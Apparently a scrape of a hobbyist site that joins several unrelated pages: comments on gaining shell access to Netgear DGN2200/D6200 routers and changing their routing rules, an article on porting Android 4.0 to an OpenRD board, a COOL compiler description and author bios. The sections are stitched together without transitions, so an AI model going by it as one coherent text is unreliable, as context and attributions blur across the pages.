I have the same question as Barry. I saw in older firmware versions they actually had the feature in the GUI (it was called WAN Preference, in the 1.1.0.19.xx version of the firmware on the Advanced > WAN Setup page). I used to have it, then I “upgraded” the firmware and lost it. I can no longer find the x.19.x firmware on the net either.

See it here (page 42). WAN Preference can be set to auto, lan, or wan (port 4). https://www.downloads.netgear.com/files/GDC/DGN2200V3/DGN2200v3_UM_15May2013.pdf

• DaveW on 2018-02-06 08:55:41 +0100

Hi there

Great resource, thanks for putting it up.

I have a DGN2200v3 sitting around that I replaced a while back and would like to use it as an wireless Access Point.

Other models have an AP mode but the 2200v3 does not display one in the GUI but you can disable the DHCP server and connect to the network via ethernet if you have DHCP on the main router.

Deon from 2013 discovered the issue that everyone else has had, the DGN2200 does not pass through the DHCP packets on wireless. Works fine via a cable to the PC from the DGN2200 as the switch is just passing through all traffic but no go on wireless.

My question is if there is a non GUI way of setting the firmware to act as an AP and allow DHCP traffic to pass?

Regards
Dave

• Gabriele on 2018-04-16 11:30:35 +0100

Hi Federico,
I can’t believe what incredible job you did it!! Very good!! By your name I think you’re italian, and I’m italian too. I’m also an arduino/raspberry builder (especially for home domotic services)
I need your kindly help to configure my router DGN2200 v4 to manage snmp service. Is there anyway? I can connect to my router via telnet successfully!
Thanks a lot!!

• Gabriele on 2018-04-16 11:32:40 +0100

Can I use that guide for a dgn2200 v4?? Thanks!

• ubuntupunk on 2019-04-30 15:18:02 +0100

DGN2200 v1, accessible only via telnetable, which passes data, and allows telnet access
but
~ # mount -n -o remount,rw /
Can’t find / in /etc/fstab

• DAVID LEWIS on 2019-05-02 15:43:13 +0100

Samba is not running Choose action: Start Restart Stop
I take it there is html missing?

• Federico Pellegrin on 2019-05-04 05:26:14 +0100

Can you do a:
cat /etc/fstab
To see what it contains in your case?

• Rikka0w0 on 2019-09-29 19:38:20 +0100

Hi,

I’m using the router as a network switch (ip fixed to 192.168.0.2), that is DHCP server on the router is disabled and the WAN port is left unused. All cable go to the LAN ports. The DHCP function is provided by another router. This setup works without any issue.

I started a TCP-based service on the router, it listens on 2233, I was able to access it from 192.168.0.x, but even I have configured port forwarding on the primary router (The one providing network access and DHCP service), the TCP-based service is not accessible from the outside network.

Do you have any idea about this?

Thanks in advance!

• Rikka0w0 on 2019-09-29 19:41:16 +0100

I’m having a similar setup with Netgear D6200 without any problem.
I think passing the DHCP traffic might be related to the iptables.

• Federico Pellegrin on 2019-10-03 04:27:33 +0100

Hi Rikka0w0,
Do you have the default route set on the router? From what you describe this would seem like the issue to me. The default route should be set to point to the other router that provides you access to the outside.

Cheers,
F.

• Rikka0w0 on 2019-10-06 16:51:24 +0100

Hi Federico,

After several attempts, I succeeded! Thanks for your help! What I discovered it that, just adding a default gateway is not going to work. I found 3 ip rules which throw packets from ips other than 192.168.x.x into the blackhole, so I deleted them:

# Delete blackhole rules
ip rule del prio 32763
ip rule del prio 32764
ip rule del prio 32765

# Set a default gateway for the network bridge (LAN ports)
route add default gw 192.168.0.1 group1

I also need to fix the DNS configuration so that programs on the router can resolve domain name:
# Set DNS name server:
echo “nameserver 8.8.8.8” > /etc/resolv.conf

While I was playing with the router, I accidentally fill up the rootfs, df command reports 100% disk usage and I was not able to use rm -rf to remove anything! The fix is really simple, copy and backup modifications made to the rootfs, and use the web management to upload a fresh official firmware image from Netgear. After reboot, the rootfs is restored. So the lesson is:
NEVER FILL UP A JFFS2 PARTITION!

I’m using D6200, the CPU part is identical to DGN2200v3. In the firmware, there’s a program called `bftpd`. I use it to setup a ftp server and transfer files.

I also compiled shadowsocks-libev, iperf2 and perl5 (does not work yet):
https://gist.github.com/rikka0w0/32c321d9f9bb5a54536f0b5da25b2a17
Instructions are here, just in case if anyone needs it.

Cheers!
Rikka0w0

• Rikka0w0 on 2019-10-21 01:20:01 +0100

Hi Federico,

I finally make it work! I have to delete some routing rules as they are sending packet from the outside to the blackhole:
# Delete blackhole rules
ip rule del prio 32763
ip rule del prio 32764
ip rule del prio 32765

Also setup the default gateway and a DNS server address:
# Set a default gateway for the network bridge (LAN ports)
route add default gw 192.168.0.1 group1
# Set DNS name server:
echo “nameserver 8.8.8.8” > /etc/resolv.conf

I got another question:
Is it possible to make the WAN port become another LAN port? I disabled the NAT and all my cable go to LAN ports. I want to have a fifth LAN port. I added the WAN port interface (eth4) to the existing bridge interface (group1) but unfortunately that doesn’t seem to work. Could you give me any suggestion?

Also I made a Gist page about my patches and compiling of multiple Linux software, here it is:
https://gist.github.com/rikka0w0/32c321d9f9bb5a54536f0b5da25b2a17

Thanks,

Rikka0w0

Android on OpenRD

This is the first article about porting Android 4.0.x AKA Ice Cream Sandwich AKA ICS on the OpenRD Client. This is a pretty powerful ARM machine (1.2 Ghz  256 KB L2 cache, 512 MB RAM and Gigabit Ethernet) with a PCIe Xgi graphics chip. The goal is having a good hacking machine, so the system will be brought up via NFS root (perhaps in a future part everything will be put on the internal NAND or a SD card, it should not be difficult).

Prerequisites

The standard U-boot provided with the OpenRD is used to boot the system. The environment of the boot-loader has to be set-up to start mainline kernel, as outlined on the Debian on the OpenRD page. The Android kernel and users-pace will be loaded via the network (the IP and paths refer to my development environment):

setenv bootargs 'console=ttyS0,115200 root=/dev/nfs
 ip=10.0.10.187:10.0.10.57:10.0.10.57:255.255.255.0:openrd:eth0:off
 nfsroot=10.0.10.253:/mnt/fat/armroots/icsrd,tcp,nolock
 init=/init rw'
tftpboot 0x00800000 openrd-android ; bootm 0x00800000

The Linux Kernel

After some research for a Linux kernel with appropriate Androidism I choose to start with the kernel published by Freescale on their Open Source git repository. I had good results with their kernel on i.MX28 and i.MX53 based machines. The patch for the OpenRD are based on the imx_2.6.38_android branch, tag imx-android-r12. ICS is based on Linux 3.0 kernel but I haven’t seen big problems using this version (just some warning about missing some IP connection tracking statistics in the sysfs file-system). You can download my latest patch for supporting the OpenRD board and the .config file I used. This patch:

• adds support for the Xgi frame-buffer I took out from the Marvell provided tree. There is a similar driver in the staging drivers directory but it didn’t work well and i preferred to stick with the driver I use normally on the OpenRD while hacking with Linux.
  • the frame-buffer driver is fixed to not allow allocation of a double-buffering surface. I haven’t dug in this problem yet, it looks like the Xgi driver reconfigures the graphic chip on every buffer flip creating a terrible flickering effect.
  • a patch for a bug in the correct handling of the L2 cache (which, unfortunately, didn’t get it’s way to the mainline kernel) is applied.
  • some other minor fixes to support Android specific OOM killer (Kirkwood arch doesn’t have ZONE_DMA) are implemented.

By the way, the tool-chain used to compile the kernel is the standard Codesourcery one.

Android user-space compilation

Android on OpenRD

It’s quite an adventure to build Android ASOP from sources. I strongly encourage you, if you are, like me, new to the Android planet, to read the wonderful book Embedded Android by Karim Yaghmour. I bought it as a pre-release but I’m sure the the four initial chapters alone saved me lot of hours browsing the Internet. I started from the 4.0.3 tag in the ASOP repo. The first step is to setup the build environment. The build dependencies are rather complicated. Following the book mentioned above this is what was needed on Debian Squeeze:

aptitude install bison flex gperf git-core gnupg zip tofrodos
 build-essential g++-multilib libc6-dev libc6-dev-i386 ia32-libs
 mingw32 zlib1g-dev lib32z1-dev x11proto-core-dev libx11-dev
 lib32readline5-dev libgl1-mesa-dev lib32ncurses5-dev
sudo ln -s /usr/lib32/libstdc++.so.6 /usr/lib32/libstdc++.so
sudo ln -s /usr/lib32/libz.so.1 /usr/lib32/libz.so

Much more complicated is to get rid of the OpenJDK/gcj Java tools incompatible with Android. I didn’t want to remove them because a whole lot of other packages depends on them. After installing latest Sun Java 6 SKD in /opt/java/ I sanitized the shell environment:

export PATH=/opt/java/bin/:$PATH
export JAVA_HOME=/opt/java/
export java_home=/opt/java/
unset _java
unset _java_classes
unset _java_find_classpath
unset _java_find_sourcepath
unset _java_packages
unset _java_path
export ANDROID_JAVA_HOME=$JAVA_HOME

The next step is writing a configuration file for the board (under device/evol/openrd for example). Much of this is quite standard as outlined in Karim’s book, the important difference is BoardConfig.mk:

TARGET_NO_KERNEL := true
TARGET_NO_BOOTLOADER := true
TARGET_CPU_ABI := armeabi-v5te
TARGET_CPU_ABI2 := armeabi
TARGET_ARCH_VARIANT := armv5te
BOARD_USES_GENERIC_AUDIO := true
USE_CAMERA_STUB := true
BOARD_HAVE_BLUETOOTH := false

Here is a list of various modifications to the AOSP needed to build and run the whole thing:

• There is quite a lot of arm7 optimized code in webrtc library (in the file spl_inl.h) that has to be substituted with standard C code.
• The code has a lot of not aligned accesses so it’s important to modify /proc/cpu/alignment to 2 in init.rc.
• Since we are mounting the root file-system via NFS we must check in init.rc that no other partitions are mounted to /data and /system. Some other directories such /mnt/sdcard are not created, we must do this as well in init.rc.
• As detailed in this post there is a bug that prevents web pages to be rendered in the Android browser. It’s pretty incredible that such a bug passed the QA at Google, but the fix cited in the post works.
• Because the network is setup before Android runs we must use the Dummy Network Tracker for the connectivity manager. It is configured in frameworks/base/core/res/res/values/config.xml. I had to make some kludges in ConnectivityService.java and NetworInfo.java to force the system believe that network is connected, I’m not sure if this is due to a real problem or, more likely, to a scarce knowledge on my side of the Android frameworks. Perhaps it would be better to use the android-x86 Ethernet Network Tracker, but I wasn’t sure how it does interact with a NFS mounted root. As far as network is concerned you have to set the DNS for the frameworks with something like  setprop net.dns1 8.8.8.8 and setprop net.dns2 8.8.4.4 in init.rc.
• I’ve disabled the OpenGL hardware rendering (there’s no such thing on the OpenRD) as outlined here (core/java/android/view/HardwareRenderer.java).

The build commands are standard:

. build/envsetup.sh
lunch
# select openrd-eng
make -j4

… and now a lot of patience 🙂

Trying it out

Android on OpenRD

Android works quite well on the OpenRD via NFS (you have to wait a bit on the first boot while the dalvik cache is created via the network and don’t expect super-smooth graphics from the frame buffer without acceleration). You can read email, browse the web and use quite a lot of apps. Here is what does the serial terminal show. You can connect to the machine also with adb connect [machine ip] and adb shell.

If you want to try the thing out on the OpenRD you can download the root file system from here. The kernel is in the /boot directory. Just export the file-system via NFS, the kernel uImage via TFTP and with the U-boot commands listed above you’re done.

There are still some problems that will be solved (hopefully) in follow-ups to this article.

• Audio is not here. I’m still thinking if it’s best to modify Samsug Tuna audio_hw.c provided in the AOSP or wait for the Android PulseAudio patches being released for ICS (the latter would mean no work to be done because ALSA audio is working well in the kernel used).
• The official Market App doesn’t work. It dies saying that the network doesn’t support a “billing method”. This has something to do with the using of the Dummy Network Tracker.
• The galley applications doesn’t show the pictures. From the logcat it looks like some OpenGL functions are not implemented (in the software OpenGL renderer I guess … strange).
• There are sporadic OutOfMemory exceptions while loading bitmaps. I saw this mentioned on some threads on the web but wasn’t able to understand it. The problem is sporadic and I’m sure there is still plenty of memory available in the system.

Comments

• Steven Jackson on 2012-02-02 12:15:32 +0100

Thanks for the tips and especially the book recommendation.

coolc doesn’t fully support all the COOL language constructs. coolc main features are centered around the developing of the dispatch construct of COOL:
ID.ID():void

Therefore, briefly, coolc is able to handle:

• definition of classes without inheritance
• definition of attributes of various types in classes
• definition of methods in classes
• definition of dispatching methods in methods body without parameters and without a return value

To make the output of the generated programs more readable and explicit an additional command “print” has been added to the COOL language. This command will simply display on screen a defined constant string (please refer to the next sections for a definition of this new language construct).
coolc will also generate and execute code for constant expressions (both integer and boolean). Execution of such code will just modify the internal status of the interpreter but won’t be used by further constructs, since the return values aren’t really handled.
coolc will additionally also construct a partial semantic tree of the code examined and perform some basic type-checking operations:

• accordance between return value and method return type definition
• compatibility of types in variable assignments
• presence of a Bool expression for NOT/IF/WHILE arguments
• redefinition of classes
• redefinition of methods and attributes inside classes
• use of undeclared variables and methods

Pay attention that just the dispatch code, the non-standard “print” and the constant expression will generate proper code to be executed by the interpreter. All the other constructs can be type-checked but will not be transformed into intermediate code (and later executed) if not maybe partially, generating unwanted execution code.
The basic Bool and Int COOL classes has been defined in coolc even if, being most of the expressions operators missing, they are quite simply managed.

You can download the full package here for the full source code, full documentation of this teaching project and code samples in the COOL language.

I was born in 1974. My mother tongues are Italian and Slovene and I have a discrete control of the English language. I work as a software developer. My hobbies are computer science, free software, science, photography, reading, and mountaineering. You can follow my wanderings on my flickr page. You can find some software I hack on on at my github page. My public key address is chripell@fsfe.org. You can also reach me at chripell@gmail.com or chri@evolware.org.

Federico Pellegrin

I was born in 1979 and started as a IT consultant in 2001. I’m a software generalist with specific knowledge in full life-cycle of embedded systems and Web interfaces applied expecially to automotive, entertainment and refrigeration industry. I’m very interested in teaching with free software systems and tools to professionals and children. I currently work at the European Southern Observatory where I mainly contribute to the build environment and infrastructure for the operational Very Large Telescope (VLT) and the upcoming Extremely Large Telescope (ELT). In my free time I enjoy reading postmodern literature and, if the weather conditions permit it, observe the skies from high mountains with my 46cm Dobsonian. You can contact me at fede@evolware.org, my GPG public key can be found on public key servers.

Una breve analisi del supporto di SQL3 di PostgreSQL 7.1.2 può essere trovata qui. (in italiano)